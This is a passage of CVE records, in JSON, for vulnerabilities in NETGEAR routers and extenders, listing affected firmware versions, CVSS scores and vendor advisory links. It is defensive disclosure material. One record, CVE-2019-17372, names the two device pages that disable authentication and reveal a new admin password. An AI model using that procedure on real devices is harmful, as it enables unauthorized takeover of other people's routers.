"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:L/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000061196/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2254",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000061196/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2254"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20731",
"datePublished": "2020-04-16T19:10:35",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:08.796Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20754
Vulnerability from cvelistv5
Published
2020-04-16 21:07
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects DGN2200 before 1.0.0.58, DGN2200B before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.80, D6220 before 1.0.0.44, EX7000 before 1.0.0.66, EX6200 before 1.0.3.88, EX6150 before 1.0.0.42, EX7500 before 1.0.0.46, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900P before 1.4.0.10, R8000P before 1.4.0.10, R7900 before 1.0.2.16, R7000P before 1.3.1.44, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.1.44, R7000 before 1.0.9.32, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.54.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:09.110Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000060628/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Modem-Routers-and-Extenders-PSV-2018-0054"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects DGN2200 before 1.0.0.58, DGN2200B before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.80, D6220 before 1.0.0.44, EX7000 before 1.0.0.66, EX6200 before 1.0.3.88, EX6150 before 1.0.0.42, EX7500 before 1.0.0.46, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900P before 1.4.0.10, R8000P before 1.4.0.10, R7900 before 1.0.2.16, R7000P before 1.3.1.44, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.1.44, R7000 before 1.0.9.32, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.54."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T21:07:26",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000060628/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Modem-Routers-and-Extenders-PSV-2018-0054"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20754",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects DGN2200 before 1.0.0.58, DGN2200B before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.80, D6220 before 1.0.0.44, EX7000 before 1.0.0.66, EX6200 before 1.0.3.88, EX6150 before 1.0.0.42, EX7500 before 1.0.0.46, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900P before 1.4.0.10, R8000P before 1.4.0.10, R7900 before 1.0.2.16, R7000P before 1.3.1.44, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.1.44, R7000 before 1.0.9.32, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.54."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000060628/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Modem-Routers-and-Extenders-PSV-2018-0054",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000060628/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Modem-Routers-and-Extenders-PSV-2018-0054"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20754",
"datePublished": "2020-04-16T21:07:26",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:09.110Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-17372
Vulnerability from cvelistv5
Published
2019-10-09 12:06
Modified
2024-08-05 01:40
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices allow remote attackers to disable all authentication requirements by visiting genieDisableLanChanged.cgi. The attacker can then, for example, visit MNU_accessPassword_recovered.html to obtain a valid new admin password. This affects AC1450, D8500, DC112A, JNDR3000, LG2200D, R4500, R6200, R6200V2, R6250, R6300, R6300v2, R6400, R6700, R6900P, R6900, R7000P, R7000, R7100LG, R7300, R7900, R8000, R8300, R8500, WGR614v10, WN2500RPv2, WNDR3400v2, WNDR3700v3, WNDR4000, WNDR4500, WNDR4500v2, WNR1000, WNR1000v3, WNR3500L, and WNR3500L.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T01:40:15.201Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/zer0yu/CVE_Request/blob/master/netgear/netgear_cgi_unauthorized_access_vulnerability.md"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices allow remote attackers to disable all authentication requirements by visiting genieDisableLanChanged.cgi. The attacker can then, for example, visit MNU_accessPassword_recovered.html to obtain a valid new admin password. This affects AC1450, D8500, DC112A, JNDR3000, LG2200D, R4500, R6200, R6200V2, R6250, R6300, R6300v2, R6400, R6700, R6900P, R6900, R7000P, R7000, R7100LG, R7300, R7900, R8000, R8300, R8500, WGR614v10, WN2500RPv2, WNDR3400v2, WNDR3700v3, WNDR4000, WNDR4500, WNDR4500v2, WNR1000, WNR1000v3, WNR3500L, and WNR3500L."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-10-09T12:06:57",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/zer0yu/CVE_Request/blob/master/netgear/netgear_cgi_unauthorized_access_vulnerability.md"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-17372",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices allow remote attackers to disable all authentication requirements by visiting genieDisableLanChanged.cgi. The attacker can then, for example, visit MNU_accessPassword_recovered.html to obtain a valid new admin password. This affects AC1450, D8500, DC112A, JNDR3000, LG2200D, R4500, R6200, R6200V2, R6250, R6300, R6300v2, R6400, R6700, R6900P, R6900, R7000P, R7000, R7100LG, R7300, R7900, R8000, R8300, R8500, WGR614v10, WN2500RPv2, WNDR3400v2, WNDR3700v3, WNDR4000, WNDR4500, WNDR4500v2, WNR1000, WNR1000v3, WNR3500L, and WNR3500L."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/zer0yu/CVE_Request/blob/master/netgear/netgear_cgi_unauthorized_access_vulnerability.md",
"refsource": "MISC",
"url": "https://github.com/zer0yu/CVE_Request/blob/master/netgear/netgear_cgi_unauthorized_access_vulnerability.md"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-17372",
"datePublished": "2019-10-09T12:06:57",
"dateReserved": "2019-10-09T00:00:00",
"dateUpdated": "2024-08-05T01:40:15.201Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18742
Vulnerability from cvelistv5
Published
2020-04-23 15:45
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by CSRF. This affects JR6150 before 1.0.1.10, R6050 before 1.0.1.10, R6250 before 1.0.4.12, R6300v2 before 1.0.4.8, R6700 before 1.0.1.16, R6900 before 1.0.1.16, R7300DST before 1.0.0.54, R7900 before 1.0.1.12, R8000 before 1.0.3.32, and R8500 before 1.0.2.74.
References
| ▼ | URL | Tags |
|---|---|---|
| https://kb.netgear.com/000051513/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0331 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:42.869Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000051513/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0331"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by CSRF. This affects JR6150 before 1.0.1.10, R6050 before 1.0.1.10, R6250 before 1.0.4.12, R6300v2 before 1.0.4.8, R6700 before 1.0.1.16, R6900 before 1.0.1.16, R7300DST before 1.0.0.54, R7900 before 1.0.1.12, R8000 before 1.0.3.32, and R8500 before 1.0.2.74."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:N/A:H/C:H/I:H/PR:N/S:U/UI:R",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-23T15:45:48",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000051513/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0331"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18742",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by CSRF. This affects JR6150 before 1.0.1.10, R6050 before 1.0.1.10, R6250 before 1.0.4.12, R6300v2 before 1.0.4.8, R6700 before 1.0.1.16, R6900 before 1.0.1.16, R7300DST before 1.0.0.54, R7900 before 1.0.1.12, R8000 before 1.0.3.32, and R8500 before 1.0.2.74."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:N/A:H/C:H/I:H/PR:N/S:U/UI:R",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000051513/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0331",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000051513/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0331"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18742",
"datePublished": "2020-04-23T15:45:48",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:42.869Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20753
Vulnerability from cvelistv5
Published
2020-04-16 21:06
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects DGN2200v1 before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.78, D6220 before 1.0.0.44, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900 before 1.0.2.16, R7000P before 1.3.2.34, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.2.34, R7000 before 1.0.9.28, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.50.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:08.974Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000060629/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Modem-Routers-PSV-2018-0085"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects DGN2200v1 before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.78, D6220 before 1.0.0.44, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900 before 1.0.2.16, R7000P before 1.3.2.34, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.2.34, R7000 before 1.0.9.28, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.50."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T21:06:54",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000060629/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Modem-Routers-PSV-2018-0085"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20753",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects DGN2200v1 before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.78, D6220 before 1.0.0.44, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900 before 1.0.2.16, R7000P before 1.3.2.34, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.2.34, R7000 before 1.0.9.28, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.50."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000060629/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Modem-Routers-PSV-2018-0085",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000060629/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Modem-Routers-PSV-2018-0085"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20753",
"datePublished": "2020-04-16T21:06:54",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:08.974Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20732
Vulnerability from cvelistv5
Published
2020-04-16 19:11
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D6220 before 1.0.0.40, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.24, R6400 before 1.0.1.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.48.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:08.892Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000061195/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2228"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D6220 before 1.0.0.40, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.24, R6400 before 1.0.1.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.48."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:L/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T19:11:23",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000061195/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2228"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20732",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D6220 before 1.0.0.40, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.24, R6400 before 1.0.1.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.48."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:L/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000061195/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2228",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000061195/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2228"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20732",
"datePublished": "2020-04-16T19:11:23",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:08.892Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2021-38534
Vulnerability from cvelistv5
Published
2021-08-10 23:59
Modified
2024-08-04 01:44
Severity ?
EPSS score ?
Summary
